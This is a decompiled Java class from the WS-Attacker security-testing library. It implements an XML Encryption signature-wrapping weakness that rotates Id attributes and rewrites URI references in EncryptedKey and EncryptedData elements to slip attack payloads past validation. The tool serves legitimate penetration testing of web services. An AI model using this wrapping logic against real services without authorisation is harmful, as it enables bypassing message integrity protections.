/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness;

import java.util.List;
import javax.xml.xpath.XPathExpressionException;
import org.apache.log4j.Logger;
import org.w3c.dom.DOMException;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.util.id.RandomIdGenerator;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.WrapModeEnum;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractEncryptionWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.AbstractWeaknessComposite;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.EncryptedKeyRefWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.FactoryWeakness;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.WeaknessType;
import wsattacker.library.xmlencryptionattack.encryptedelements.AbstractEncryptionElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.data.EncryptedDataElement;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlencryptionattack.util.HelperFunctions;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class EncryptionAttributeIdWeakness
extends AbstractWeaknessComposite {
    private static final Logger LOG = Logger.getLogger(EncryptionAttributeIdWeakness.class);
    private int m_MaxPosAttr = 2;

    public EncryptionAttributeIdWeakness(AbstractEncryptionElement encPay, EncryptedKeyElement encKey) throws InvalidWeaknessException {
        this.m_EncKey = encKey;
        this.m_EncPay = encPay;
        this.determineEncSignMode(encPay, encKey);
        String payName = encPay.getEncryptedElement().getLocalName();
        if (WrapModeEnum.WRAP_ENC_ELEMENT == this.m_WrapMode || payName.equals("EncryptedKey") && WrapModeEnum.WRAP_ENCKEY_WRAP_ENCDATA == this.m_WrapMode) {
            if (!encPay.getIdValue().equals("")) {
                this.setPossibleWeaks(this.m_MaxPosAttr);
            } else {
                LOG.info((Object)"No EncryptionIdWeakness");
            }
        } else {
            EncryptedKeyRefWeakness encKeyRefWeak = (EncryptedKeyRefWeakness)FactoryWeakness.generateWeakness(WeaknessType.ENCKEY_REF_WEAKNESS, encPay, encKey);
            this.m_WeaknessList.add(encKeyRefWeak);
            if (WrapModeEnum.ENCKEY_WRAP_ENCDATA == this.m_WrapMode || WrapModeEnum.WRAP_ENCKEY_WRAP_ENCDATA == this.m_WrapMode && encPay.getEncryptedElement().getLocalName().equals("EncryptedData")) {
                this.m_MaxPosAttr = 1 + encKeyRefWeak.getPossibleNumWeaks();
                this.setPossibleWeaks(this.m_MaxPosAttr);
            } else if (WrapModeEnum.WRAP_ENCKEY_ENCDATA == this.m_WrapMode) {
                this.setPossibleWeaks(this.m_MaxPosAttr * encKeyRefWeak.getPossibleNumWeaks());
            }
        }
    }

    @Override
    public int getPossibleNumWeaks() {
        return this.m_PossibleWeaks;
    }

    private void setPossibleWeaks(int numberOfPossibilities) {
        this.m_PossibleWeaks = numberOfPossibilities;
    }

    @Override
    public void abuseWeakness(int index, Element encKey, Element payloadElement) {
        try {
            int keyRefWeakIdx = index / this.m_MaxPosAttr;
            index %= this.m_MaxPosAttr;
            switch (this.m_WrapMode) {
                case WRAP_ENC_ELEMENT: {
                    this.handleWrapEncryptedElement(index, encKey, payloadElement);
                    break;
                }
                case ENCKEY_WRAP_ENCDATA: {
                    this.handleEncKeyWrapEncData(index, keyRefWeakIdx, encKey, payloadElement);
                    break;
                }
                case WRAP_ENCKEY_ENCDATA: {
                    this.handleWrapEncKeyEncData(index, keyRefWeakIdx, encKey, payloadElement);
                    break;
                }
                case WRAP_ENCKEY_WRAP_ENCDATA: {
                    this.handleWrapEncKeyWrapEncData(index, keyRefWeakIdx, encKey, payloadElement);
                }
            }
        }
        catch (XPathExpressionException ex) {
            LOG.error((Object)ex);
        }
    }

    private String changeIdOfPayElement(Element payElement) {
        String randID = null;
        Node idAttr = payElement.getAttributes().getNamedItem("Id");
        if (null != idAttr) {
            randID = RandomIdGenerator.rotate_ID((String)idAttr.getNodeValue());
            payElement.getAttributes().getNamedItem("Id").setTextContent(randID);
            LOG.info((Object)("Id of element " + payElement.getLocalName() + " changed to Id=" + randID));
            return randID;
        }
        LOG.info((Object)(payElement.getLocalName() + " has no id attribute"));
        throw new IllegalArgumentException("No Id-Attribute but Id has to change?");
    }

    private void handleWrapEncryptedElement(int index, Element encKey, Element payloadElement) {
        switch (index) {
            case 0: {
                this.changeIdOfPayElement(payloadElement);
                break;
            }
            case 1: {
                break;
            }
            default: {
                String error = "Index out of range: '" + index + "'";
                LOG.warn((Object)error);
            }
        }
    }

    private void handleEncKeyWrapEncData(int index, int keyRefWeakIdx, Element encKey, Element payloadElement) throws DOMException, XPathExpressionException {
        switch (index) {
            case 0: 
            case 1: {
                this.changeIdOfPayElement(payloadElement);
                ((AbstractEncryptionWeakness)this.m_WeaknessList.get(0)).abuseWeakness(index, encKey, payloadElement);
                break;
            }
            case 2: {
                ((AbstractEncryptionWeakness)this.m_WeaknessList.get(0)).abuseWeakness(index, encKey, payloadElement);
                break;
            }
            case 3: {
                LOG.info((Object)("Hold EncryptedData Id =" + payloadElement.getAttribute("Id")));
                break;
            }
            default: {
                String error = "Index out of range: '" + index + "'";
                LOG.warn((Object)error);
            }
        }
    }

    private void handleWrapEncKeyEncData(int index, int keyRefWeakIdx, Element encKey, Element payloadElement) throws DOMException, XPathExpressionException {
        switch (index) {
            case 0: {
                String oldId = this.getOrigIdOfEncKey(payloadElement);
                this.changeIdOfPayElement(payloadElement);
                if (this.m_WeaknessList.isEmpty()) break;
                if (payloadElement.getLocalName().equals("EncryptedKey") && null != oldId) {
                    this.changeReferenceInEncDataPay(payloadElement, oldId);
                }
                ((AbstractEncryptionWeakness)this.m_WeaknessList.get(0)).abuseWeakness(keyRefWeakIdx, payloadElement, payloadElement);
                break;
            }
            case 1: {
                if (this.m_WeaknessList.isEmpty()) break;
                ((AbstractEncryptionWeakness)this.m_WeaknessList.get(0)).abuseWeakness(keyRefWeakIdx, payloadElement, null);
                break;
            }
            default: {
                String error = "Index out of range: '" + index + "'";
                LOG.warn((Object)error);
            }
        }
    }

    private String getOrigIdOfEncKey(Element payloadElement) throws DOMException {
        String oldId = null;
        Node idAttr = payloadElement.getAttributes().getNamedItem("Id");
        if (null != idAttr && !idAttr.getTextContent().equals("")) {
            oldId = idAttr.getTextContent();
        }
        return oldId;
    }

    private void handleWrapEncKeyWrapEncData(int index, int keyRefWeakIdx, Element encKey, Element payloadElement) throws XPathExpressionException {
        if (payloadElement.getLocalName().equals("EncryptedData")) {
            this.handleEncKeyWrapEncData(index, keyRefWeakIdx, encKey, payloadElement);
        } else if (payloadElement.getLocalName().equals("EncryptedKey")) {
            String oldId = this.getOrigIdOfEncKey(payloadElement);
            this.handleWrapEncryptedElement(index, null, payloadElement);
            if (null != oldId) {
                this.changeReferenceInEncDataPay(payloadElement, oldId);
            }
        } else {
            throw new IllegalArgumentException("No valid payload in SignEncKeySignEncData mode!");
        }
    }

    private void changeReferenceInEncDataPay(Element keyPayElement, String origKeyIdVal) throws DOMException, XPathExpressionException {
        EncryptedDataElement attackEncData = HelperFunctions.getEncDataOfEncryptedKey((EncryptedKeyElement)this.m_EncPay);
        Element attackDataEl = attackEncData.getAttackProperties().getAttackPayloadElement();
        List referenced = DomUtilities.evaluateXPath((Document)keyPayElement.getOwnerDocument(), (String)String.format("//*[@URI='#%s']", origKeyIdVal));
        if (null != attackDataEl) {
            for (int i = 0; referenced.size() > i; ++i) {
                short containModeData = attackDataEl.compareDocumentPosition((Node)referenced.get(i));
                if (0 != containModeData && 0 >= (0x10 & containModeData) && 0 >= (8 & containModeData)) continue;
                ((Node)referenced.get(i)).getAttributes().getNamedItem("URI").setTextContent("#" + keyPayElement.getAttribute("Id"));
            }
        }
    }

    public int getMaxPosAttr() {
        return this.m_MaxPosAttr;
    }
}

